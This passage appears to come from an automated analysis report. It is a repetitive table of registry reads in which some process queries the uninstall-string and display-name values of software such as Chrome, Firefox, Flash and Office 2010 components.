|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin | value_name = UninstallString, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin | value_name = DisplayName, data = 65 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome | value_name = DisplayName, data = 71 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2 | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PRJPROR | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PRJPROR | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PRJPROR | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PRJPROR | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUSR | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUSR | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUSR | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUSR | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.VISIOR | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.VISIOR | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.VISIOR | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.VISIOR | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217045FF} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217045FF} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217045FF} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83217045FF} | value_name = DisplayName, data = 74 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{444C5574-6BE0-323E-9BDD-922F6C3C4A04} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{444C5574-6BE0-323E-9BDD-922F6C3C4A04} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{444C5574-6BE0-323E-9BDD-922F6C3C4A04} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{444C5574-6BE0-323E-9BDD-922F6C3C4A04} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} | value_name = UninstallString, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PRJPROR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PRJPROR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PRJPROR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PRJPROR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUSR_{99ACCA38-6DD3-48A8-96AE-A283C9759279} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PRJPROR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PRJPROR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PRJPROR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PRJPROR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUSR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PRJPROR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PRJPROR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PRJPROR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PRJPROR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = UninstallString, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = UninstallString, data = 34 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUSR_{DEA87BE2-FFCC-4F33-9946-FCBE55A1E998} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
